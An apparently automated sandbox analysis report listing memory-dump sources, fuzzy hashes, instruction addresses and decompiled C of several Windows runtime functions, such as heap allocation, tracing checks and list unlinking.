0x050414db
0x050414e6
0x00000000
0x050414f2
0x050414e8
0x00000000
0x050414e8
0x050090d8
0x050090da
0x050090dd
0x050090e5
0x00000000
0x05009139
0x050090fa
0x050090fe
0x05009142
0x00000000
0x05009142
0x05009104
0x05009107
0x0500910b
0x05009110
0x05009118
0x05009147
0x05009148
0x0500914f
0x05009150
0x05009151
0x05009152
0x05009156
0x0500915d
0x05009160
0x05009168
0x0500916c
0x050091bc
0x050091be
0x00000000
0x050091be
0x0500916e
0x05009173
0x05009176
0x00000000
0x00000000
0x0500917c
0x05009180
0x050091b5
0x00000000
0x050091b5
0x05009182
0x05009185
0x05009189
0x00000000
0x00000000
0x0500918e
0x05009190
0x05009198
0x00000000
0x00000000
0x050091a0
0x00000000
0x050091ad
0x050091ad
0x050091b0
0x050091b1
0x00000000
0x05009185
0x0500911a
0x0500911c
0x0500911f
0x05009125
0x05009127
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 12eaa60a33a5630a46c013306afbebcbdc8172ce1a9c8fb504b27be161d42d57
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 052180B1A00204EFEB20DF59E844EAEF7F9EB48310F14887AE945A7251D370ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04FF3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04FF3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x50b84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x50b84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x50b84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0500AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0500FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x50b84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x50b84c4; // 0x0
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x04ff3b89
0x04ff3b96
0x04ff3ba1
0x04ff3bab
0x04ff3bb5
0x04ff3bb9
0x05036298
0x04ff3bbf
0x04ff3bc2
0x04ff3bc3
0x04ff3bc9
0x04ff3bca
0x04ff3bcc
0x04ff3bcd
0x04ff3bd4
0x04ff3bd6
0x04ff3bdb
0x04ff3bea
0x04ff3bf7
0x04ff3bfb
0x04ff3bff
0x04ff3c09
0x04ff3c0a
0x04ff3c0b
0x04ff3c0f
0x04ff3c14
0x04ff3c18
0x04ff3c18
0x04ff3bfb
0x04ff3c1b
0x04ff3c30
0x04ff3c30
0x04ff3c3d

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a15cca23db67dfefb3db55fb30cac3dd08589711687ea145e028fad1842af4
Instruction ID: 823e6aac3cf0e9649329b3ff1d32ada56d2f873149add17487fe936496d2cdfe
Opcode Fuzzy Hash: 83a15cca23db67dfefb3db55fb30cac3dd08589711687ea145e028fad1842af4
Instruction Fuzzy Hash: 4521B072600104AFD700DF58DD81BAEBBBDFF40308F150068EA04AB261D771AD128B90

Uniqueness

Uniqueness Score: -1.00%

Function 05046CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05046CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04FE7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04FE7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4fa5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04FFF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04FFF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E05047016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04FE2400( &_v52);
								}
								_t21 = L04FE2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x05046cfb
0x05046d00
0x05046d02
0x05046d06
0x05046d0a
0x05046d0e
0x05046d19
0x05046d2b
0x05046d1b
0x05046d24
0x05046d24
0x05046d33
0x05046d39
0x05046d46
0x05046d4f
0x05046d61
0x05046d51
0x05046d5a
0x05046d5a
0x05046d69
0x05046d6b
0x05046d6d
0x05046d6f
0x05046d6f
0x05046d74
0x05046d79
0x05046d7a
0x05046d7f
0x05046d82
0x05046d88
0x05046d89
0x05046d90
0x05046d94
0x05046da7
0x05046db1
0x05046db1
0x05046dbb
0x05046dbb
0x05046d90
0x05046d69
0x05046d46
0x05046dc6

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c07dd0022d99fa716908a39931eb99fa2ff93353cd91733ed929fb17c2181a
Instruction ID: 41fbb7cc044717ec0f807e2e2cdb24758a337d8623a5adc68d30731c602e39ec
Opcode Fuzzy Hash: 00c07dd0022d99fa716908a39931eb99fa2ff93353cd91733ed929fb17c2181a
Instruction Fuzzy Hash: 1021D3B2904A449BD311EF29DD44F6FB7ECEF82644F040466B94187261EB35E909CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0509070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0509070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E050907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0508AFDE( &_v8,  &_v12);
					E05091293(_t38, _v28, _t60);
					if(E04FE7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E050814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0509071b
0x05090724
0x05090734
0x05090738
0x0509074b
0x0509074b
0x05090753
0x05090753
0x05090759
0x0509075d
0x05090774
0x05090779
0x0509077d
0x05090789
0x05090795
0x050907a7
0x05090797
0x050907a0
0x050907a0
0x050907af
0x050907c4
0x050907cd
0x050907cd
0x050907af
0x050907dc

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: d57318519903f07d4ed4c32f0ec43a81ef22df8a3df493e43a43e02b08535c72
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 7D21253A7082009FDB09DF18D898AAEBBE5FFD0320F048529F8958B385D630D809CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04FEAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04FEAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04FE7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04FE7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04FE7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04FE7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E05047794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x04feae78
0x04feae7c
0x04feae7e
0x04feae81
0x04feae86
0x04feae8d
0x05032691
0x04feae93
0x04feae93
0x04feae93
0x04feae98
0x04feae9d
0x050326a2
0x050326b4
0x050326a4
0x050326ad
0x050326ad
0x050326b9
0x00000000
0x050326bb
0x00000000
0x050326bb
0x04feaea3
0x04feaea3
0x04feaea3
0x04feaeaa
0x050326c0
0x050326c9
0x050326c9
0x04feaeb3
0x050326d4
0x050326e1
0x00000000
0x00000000
0x050326e7
0x050326ee
0x050326f0
0x050326f9
0x050326f9
0x05032702
0x05032708
0x05032708
0x0503270b
0x0503270f
0x05032711
0x05032711
0x05032725
0x05032725
0x00000000
0x04feaeb9
0x04feaeb9
0x04feaebf
0x04feaebf
0x04feaeb3

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: d55ee82cd20e6ff5c68bf49c16040689b0a17e256326195f0d0fd6be352ff66e
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 9321D476A05686DFEB259B2AE944B3977E9FF44340F0900B1DD048B6A2E734EC42C690

Uniqueness

Uniqueness Score: -1.00%

Function 05047794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E05047794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x50b7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0500F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04FE7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E05009AE0();
					_t24 = L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x05047799
0x0504779a
0x0504779b
0x050477a3
0x050477ab
0x050477ae
0x050477b1
0x050477b1
0x050477bf
0x050477c4
0x050477c8
0x050477ce
0x050477d4
0x050477e0
0x050477e0
0x050477d6
0x050477d6
0x050477de
0x00000000
0x00000000
0x050477de
0x050477e5
0x050477f0
0x050477f3
0x050477f6
0x050477fd
0x05047800
0x0504780c
0x05047818
0x0504782b
0x0504781a
0x05047823
0x05047823
0x05047830
0x05047831
0x05047838
0x0504783d
0x0504783e
0x0504784f
0x0504784f
0x0504785a

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622ea0ebf5b97f54bd5ebd357c3c0af7fca1c8067357d7c1040c5be3192e8673
Instruction ID: c8b9ea3ec52f42231fed8faa0c7e328e26a9137fef46b67eddf5b0baecf52186
Opcode Fuzzy Hash: 622ea0ebf5b97f54bd5ebd357c3c0af7fca1c8067357d7c1040c5be3192e8673
Instruction Fuzzy Hash: B9219F72500604ABC725DF69EC80EABB7E9FF88740F10056DF90AD7690D734E901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04FFFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04FFFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04FD76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x04fffd9b
0x04fffda0
0x04fffda1
0x04fffdab
0x04fffdad
0x04fffdb0
0x04fffdb8
0x04fffe0f
0x04fffde6
0x04fffde9
0x04fffdec
0x0503c0c0
0x04fffdfe
0x04fffe06
0x04fffe06
0x0503c0c8
0x04fffe2d
0x04fffe2d
0x00000000
0x04fffe2d
0x0503c0d1
0x0503c0e0
0x0503c0e5
0x0503c0e5
0x0503c0e8
0x00000000
0x0503c0e8
0x04fffdf4
0x00000000
0x00000000
0x04fffdf6
0x04fffdfa
0x04fffe1a
0x04fffe1f
0x04fffe1f
0x04fffdfc
0x00000000
0x04fffdfc
0x04fffdcc
0x04fffdd0
0x04fffe26
0x00000000
0x04fffe26
0x04fffdd8
0x04fffddb
0x04fffddd
0x04fffde0
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: bbbbb7fb3c78d43682b3959a7b7267d008a97959a8fe09317d3939a379a9ec82
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: F7217C72A00A40DBD735CF0AD940E6AF7E5FF94B10F24857EEA4587621E730AC02DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04FC9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x509f708);
				E0501D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E050095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E050095D0();
				_t33 =  *0x50b84c4; // 0x0
				L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x50b84c4; // 0x0
				L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x50b84c4; // 0x0
				E04FE2280(L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x50b86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E050095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E050095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04FC9325();
					_t50 =  *0x50b84c4; // 0x0
					return E0501D0D1(L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x04fc9240
0x04fc9242
0x04fc9247
0x04fc924c
0x04fc924e
0x04fc9255
0x04fc9257
0x04fc925a
0x04fc925f
0x04fc925f
0x04fc9266
0x04fc9271
0x04fc9276
0x04fc9279
0x04fc927e
0x04fc9295
0x04fc929a
0x04fc92b1
0x04fc92b6
0x04fc92d7
0x04fc92dc
0x04fc92e0
0x04fc92e6
0x04fc92e8
0x04fc92ee
0x04fc9332
0x04fc9333
0x04fc9337
0x04fc9338
0x04fc933a
0x04fc933a
0x04fc933d
0x04fc9342
0x04fc9342
0x04fc9345
0x04fc9349
0x04fc934e
0x04fc9352
0x04fc9357
0x04fc92f4
0x04fc92f4
0x04fc92f6
0x04fc92f9
0x04fc9300
0x04fc9306
0x04fc9324
0x04fc9324

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d38d02a2b967910134321b24124f7a9bbe41fcc55f9946cd0d8f78837be45d2
Instruction ID: 5749458f092b5b9b57333807f5951ec7e357724c3352b2e0711df932cd7746e9
Opcode Fuzzy Hash: 6d38d02a2b967910134321b24124f7a9bbe41fcc55f9946cd0d8f78837be45d2
Instruction Fuzzy Hash: 7F213972151A41DFD726EF68DE40F59B7F9FF08708F04496CA049866B2CB74E942DB44

Uniqueness

Uniqueness Score: -1.00%

Function 04FFB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04FFB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04FE2280(_t12, 0x50b8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E050000C2(0x50b8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x04ffb395
0x04ffb3a2
0x04ffb3a5
0x04ffb3aa
0x04ffb3b2
0x04ffb3ba
0x04ffb3bd
0x04ffb3c0
0x04ffb3c4
0x04ffb3c9
0x0503a3e9
0x0503a3ed
0x0503a3f0
0x0503a3ff
0x0503a403
0x0503a409
0x00000000
0x00000000
0x0503a40b
0x0503a40b
0x0503a40f
0x0503a415
0x0503a423
0x0503a423
0x0503a415
0x04ffb3d1
0x04ffb3e8
0x04ffb3e8
0x04ffb3d9

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071813bb59b56395deec6a48446cdf840177503b9a80e050521dc7e33888517d
Instruction ID: 4b9b11b039b6666a22f6c4a9983a3f48c3e05b9061be50e8d99c7f820913419d
Opcode Fuzzy Hash: 071813bb59b56395deec6a48446cdf840177503b9a80e050521dc7e33888517d
Instruction Fuzzy Hash: 8A1148337451109BDB28DA55EDC1A6F72ABEFC5330B254129EE16877A0E931BC03C690

Uniqueness

Uniqueness Score: -1.00%

Function 05054257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E05054257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x50a08d0);
				E0501D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E050541E8(__ebx, __edi, __ecx, _t39);
				E04FDEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x50b87e4;
					_t18 =  *0x50b87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x50b5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x50b87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x50b87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04FC7055(_t31 + 0xfffffff8);
								_t24 =  *0x50b87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x50b87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x50b5cd0;
				if( *0x50b5cd0 <= 0) {
					L04FC7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x50b87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x50b87e8 = _t30;
						 *0x50b87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0501D0D1(L05054320());
			}

0x05054257
0x05054257
0x05054257
0x05054259
0x0505425e
0x05054263
0x05054265
0x05054273
0x05054278
0x0505427c
0x0505427f
0x05054281
0x05054287
0x050542d7
0x050542d7
0x050542da
0x0505428d
0x0505428d
0x0505428f
0x05054292
0x05054297
0x0505429c
0x050542a0
0x050542a6
0x050542a8
0x050542ae
0x050542b3
0x00000000
0x050542ba
0x050542ba
0x050542bf
0x050542c5
0x050542ca
0x050542cf
0x050542d0
0x00000000
0x050542d0
0x050542b3
0x00000000
0x050542a6
0x0505429c
0x050542dc
0x050542dc
0x050542e3
0x05054309
0x050542e5
0x050542e5
